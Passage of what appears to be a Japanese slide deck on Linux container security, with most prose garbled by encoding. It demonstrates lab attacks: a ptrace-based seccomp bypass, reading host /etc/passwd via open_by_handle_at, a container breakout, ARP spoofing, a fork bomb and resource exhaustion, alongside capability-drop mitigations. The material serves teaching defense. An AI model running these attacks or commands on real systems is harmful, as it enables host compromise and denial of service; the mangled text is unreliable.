  102. TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ

    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘ ېࢭ͞Ε͍ͯΔγεςϜίʔϧ

  103. TFDDPNQͷCZQBTT wTFDDPNQϕʔεͷ4BOECPY؀ڥ͸Τεέʔϓ͢Δ͜ͱ͕Ͱ͖Δ wmkdir(2)͕ېࢭ͞Ε͍ͯͯ΋ճආͰ͖Δ wઈରʹptrace(2)ͷ࢖༻ΛڐՄͯ͠͸͍͚ͳ͍ʂ wτϨʔα͕ϓϩηεͷγεςϜίʔϧΛมߋͯ͠ϑΟϧλΛόΠύεͰ͖Δ wͨͩ͠-JOVY,FSOFMҎલͷόʔδϣϯͰ௨༻͢Δ

  104. TFDDPNQΛCZQBTTͯ͠ΈΑ͏ root@sample1:~/# ls bypass_seccomp.c root@sample1:~/# mkdir dir Bad system call

    root@sample1:~/# gcc bypass_seccomp.c root@sample1:~/# ./a.out root@sample1:~/# ls -al … drwxr-xr-x 2 root root 4096 Sep 10 12:27 dir # ࡞੒Ͱ͖ͨ

  105. NLEJS  TFDDPNQ Bad system call

  106. HFUQJE  TFDDPNQ QUSBDF getpid(2) Λݺͼग़͢ঢ়ଶʢϨδελʣΛ mkdir(2) Λݺͼग़͢ঢ়ଶʹมߋ NLEJS 

  107. QUSBDF  kill(getpid(), SIGSTOP); syscall(SYS_getpid, SYS_mkdir, "dir", 0777); if (regs.orig_rax

    == SYS_getpid) { regs.orig_rax = regs.rdi; regs.rdi = regs.rsi; regs.rsi = regs.rdx; regs.rdx = regs.r10; ptrace(PTRACE_SETREGS, pid, NULL, &regs); }

  108. -JOVY$BQBCJMJUZ

  109. wSPPUͷΈ͕࢖༻Ͱ͖ΔݖݶΛɺࡉ੍͔͘ޚͰ͖Δ࢓૊Έ wҰ෦͚ͩ෇༩ͨ͠Γ੍ݶͨ͠Γ DBQBCJMJUZ $"1@4:4@"%.*/ $"1@4:4@$)3005 $"1@4:4@153"$& $"1@/&5@3"8 $"1@4:4@#005 NPVOU 

    ͳͲ DISPPU   QUSBDF  3"8ιέοτ QJOHͳͲ SFCPPU  ͱLFYFD@MPBE  -JOVY$BQBCJMJUZ

  110. έΠύϏϦςΟΛମݧ͠Α͏ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 PING 8.8.8.8

    (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_seq=1 ttl=63 time=5.54 ms ^C --- 8.8.8.8 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms

  111. έΠύϏϦςΟΛମݧ͠Α͏ root@sample1:/# mount /dev/sda1 /mnt/ root@sample1:/# cat /mnt/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

    … vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  112. έΠύϏϦςΟΛ%301 $ cat sample3.haco … config.capabilities.allow :all config.capabilities.drop "cap_sys_admin" config.capabilities.drop

    "cap_net_raw" …

  113. ݖݶ͕ͳ͍ͷͰ࣮ߦෆՄೳ $ haconiwa start sample3.haco root@sample1:/# ping 8.8.8.8 ping: icmp

    open socket: Operation not permitted root@sample1:/# mount /dev/sda1 /mnt/ mount: permission denied

  114. TZTDBMM LFYFD@MPBE JOJU@NPEVMF pOJU@NPEVMF EFMFUF@NPEVMF PQFO@CZ@IBOEMF@BU ৽͍͠ΧʔωϧΛϩʔυͰ͖Δ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛϩʔυ ΧʔωϧϞδϡʔϧΛ࡟আ

    ϋϯυϧʹରԠ͢ΔϑΝΠϧΛ։͘

  115. PQFO@CZ@IBOEMF@BU wϑΝΠϧϋϯυϧ͕ࢀর͢ΔϑΝΠϧΛ։͘γεςϜίʔϧ •CAP_DAC_READ_SEARCH wϑΝΠϧͱσΟϨΫτϦͷಡΈग़͠ͷݖݶνΣοΫΛόΠύε͢Δ wCJOENPVOUͨ͠σΟϨΫτϦͱಉ͡ϑΝΠϧγεςϜʹ͋Δ೚ҙͷϑΝΠϧ ʹΞΫηεՄೳ

  116. PQFO@CZ@IBOEMF@BU int open_by_handle_at( int mount_fd, struct file_handle *handle, int flags);

    struct file_handle { unsigned int handle_bytes; /* Size of f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ };

  117. PQFO@CZ@IBOEMF@BU struct file_handle { unsigned int handle_bytes; /* Size of

    f_handle [in, out] */ int handle_type; /* Handle type [out] */ unsigned char f_handle[0]; /* File identifier */ }; ઌ಄όΠτʹ͸։͖͍ͨϑΝΠϧͷJOPEF൪߸

  118. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 23125 Links: 1 struct my_file_handle h = { .handle_bytes = 8, .handle_type = 1, // 23125 = 5a 55 .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

  119. PQFO@CZ@IBOEMF@BU $ stat /etc/passwd File: '/etc/passwd' Size: 1724 Blocks: 8

    IO Block: 4096 regular file Device: 801h/2049d Inode: 57824 Links: 1 $ haconiwa start sample4.c root@sample1:/# vim read_passwd.c // Change ex) 57824= e1 e0 .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00} };

  120. PQFO@CZ@IBOEMF@BU root@sample1:/# gcc read_passwd.c root@sample1:/# ./a.out root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin …

    vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  121. ϗετͷγΣϧΛऔΔ root@sample1:/# gcc breakout.c root@sample1:/# ./a.out $ sudo haconiwa start

    demo1.haco

  122. εΠενʔζϞσϧ w ίϯςφͰར༻͞ΕΔηΩϡϦςΟػߏ͸ɺҰ෦ػೳ͕ॏෳ͍ͯ͠Δ΋ͷ΋͋Δ w $BQBCJMJUZͱTFDDPNQͷ྆ํͰಛఆͷγεςϜίʔϧΛېࢭ͍ͯͨ͠Γ w ͋Δػߏ͕#ZQBTT͞Εͯ͠·ͬͯ΋ɺผͷػߏͰ๷͙؇࿨͢Δ w TFDDPNQ͕#ZQBTT͞Εͯ΋$BQBCJMJUZͰ๷͙

  123. ίϯςφͷωοτϫʔΫ

  124. $POUBJOFS/FUXPSL wLXD͸σϑΥϧτઃఆͰ͸ ϒϦοδ͕࡞੒͞ΕΔ eth0 lxdbr0 veth0 eth0 veth0 eth0 $POUBJOFS

    $POUBJOFS #SJEHF 

  125. #SJEHF/FUXPSL $ ip addr show dev lxdbr0 4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP>

    mtu 1500 qdisc noqueue state UP group default qlen 1000 link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff inet 10.152.207.1/24 scope global lxdbr0 valid_lft forever preferred_lft forever inet6 fd2e:8281:6de5:9841::1/64 scope global valid_lft forever preferred_lft forever inet6 fe80::281a:c0ff:fed1:4b28/64 scope link valid_lft forever preferred_lft forever

  126. $POUBJOFS/FUXPSL wίϯςφΛϗεςΟϯά͍ͯ͠Δ ৔߹ɺΠϯλʔωοτ͔Βτϥ ϑΟοΫΛड͚Δ w΋͠ίϯςφ಺ͷϢʔβʔ͕τϥ ϑΟοΫΛ๣डͰ͖ͨΒʜʁ 4500 0088 7f79 4000

    4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

  127. "314QPPpOH w"31ͷੑ࣭Λར༻ͯ͠ϧʔςΟϯ άΛมߋ͢Δ w"31ςʔϒϧ ΞυϨεରরද Λ ৴͡ΔࣄͰ੒Γཱ͍ͬͯΔ wԠ౴Λِ૷͢Δ͜ͱʹΑΓޡͬͨ "31ςʔϒϧΛԚછͤ͞Δ͜ͱ͕ Ͱ͖Δ

    4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

  128. "315BCMF vagrant@ubuntu-xenial:~$ lxc list attacker | RUNNING | 10.128.193.110 (eth0)

    victim | RUNNING | 10.128.193.231 (eth0) vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0 # attacker ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 # victim ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  129. ίϯςφͱૄ௨͕औΕΔ͜ͱΛ֬ೝ vagrant@ubuntu-xenial:~$ lxc exec attacker bash root@test1:~# ping 10.128.193.231 #

    victim ip PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data. 64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms ^C --- 10.128.193.231 ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

  130. "314QPPpOH root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null & [1]

    1619 root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null & [2] 1620

  131. "315BCMF vagrant@ubuntu-xenial:~$ arp -a ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on

    lxdbr0 ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3 ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0 ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  132. ύέοτΛΩϟϓνϟ͢Δ root@attacker:~# tcpdump -i any -vv -w test.pcap vagrant@ubuntu-xenial:~/shared$ curl

    10.128.193.231

  133. औಘͨ͠ύέοτΛݟͯΈΔ $ lxc file pull attacker/root/test.pcap ./ $ tcpdump -X

    tcp port 80 -r test.pcap 0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101 E...!&@.?..g.... 0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be .....(.P........ 0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb .....].......... 0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31 ....GET./.HTTP/1 0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238 .1..Host:.10.128 0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41 .193.231..User-A 0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e gent:.curl/7.47. 0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a 0..Accept:.*/*.. 0x0080: 0d0a ..

  134. ͦͷଞͷ"UUBDL4VSGBDF

  135. ENFTHͷόοϑΝϦϯάݺͼग़͠ͱফڈ root@sample1:/# dmesg [ 311.470895] EXT4-fs (sda1): error count since

    last fsck: 28 [ 311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691 [ 311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449 … root@06399a7a8814:/# dmesg -C root@06399a7a8814:/# dmesg

  136. OFHBUJWFEFOUSZͷେྔੜ੒ root@sample1:/# perl -e 'stat("/$_") for 1..100000000’ vagrant@ubuntu-xenial:~$ sudo slabtop

    Active / Total Objects (% used) : 4172542 / 4182249 (99.8%) Active / Total Slabs (% used) : 197606 / 197606 (100.0%) Active / Total Caches (% used) : 78 / 122 (63.9%) Active / Total Size (% used) : 790487.34K / 794654.96K (99.5%) Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K OBJS ACTIVE USE OBJ SIZE SLABS OBJ/SLAB CACHE SIZE NAME 4050564 4050564 100% 0.19K 192884 21 771536K dentry

  137. 'JMF%FTDSJQUPSΛେྔੜ੒ w։͚ΔϑΝΠϧσΟεΫϦϓλͷ਺ʹ͸ ্ݶ͕͋Γɺ/proc/sys/fs/file- maxͰ֬ೝͰ͖Δɻ wίϯςφͷதͷϓϩηε͕͜ͷ஋ͷ਺ ͚ͩϑΝΠϧσΟεΫϦϓλΛ։͘ͱɺ VJEΛڞ༗͍ͯ͠Δ৔߹͸ϗετଆʹ΋ Өڹ͕ੜ͡Δɻ for(i=0; i=99198;

    i++) { sprintf(buf, “/tmp/%d", i); int fd = open(buf, O_CREAT); if( fd == -1 ){ printf("max fd %d\n”, i); break; } } for(;;);

  138. GPSLCPNC $ :(){ :|: & };: $ for i in

    {1..9999}; do sleep infinity & done

  139. σΟεΫ༰ྔ $ fallocate -l 20g big_file • ίϯςφʹσΟεΫ༰ྔ੍ݶ͕ͳ͍৔߹͸େ͖ͳϑΝΠϧΛ࡞੒͢Δ͜ͱͰɺ ϗετͷσΟεΫ༰ྔΛѹഭͤ͞Δ͜ͱ͕Ͱ͖Δɻ $

    dd if=/dev/zero of=tempfile bs=20GB count=10

  140. ·ͱΊ IUUQTqJDLSQ;[

  141. ·ͱΊ w-JOVYίϯςφ͸ෳ਺ͷηΩϡϦςΟػߏʹΑͬͯकΒΕ͍ͯΔ wεΠενʔζϞσϧʢFYTFDDPNQ͕΍ΒΕͯ΋$BQBCJMJUZ͕͋Δʣ wઃఆʹෆඋ͕͋Δͱίϯςφ͔Βϗετɺଞͷίϯςφ΁ӨڹΛٴ΅͢ w-9$΍%PDLFSͳͲ͸σϑΥϧτͰ͜ΕΒͷ߈ܸΛ๷͙ઃఆΛࢪ͍ͯ͠Δ w΋͔ͨ͠͠Βෆඋ͕͋Δ͔΋Ͷ  w$7&

  142. ܅΋ϖύϘͰಇ͔ͳ͍͔ʁ ࠷৽ͷ࠾༻৘ใΛνΣοΫˠ !QC@SFDSVJU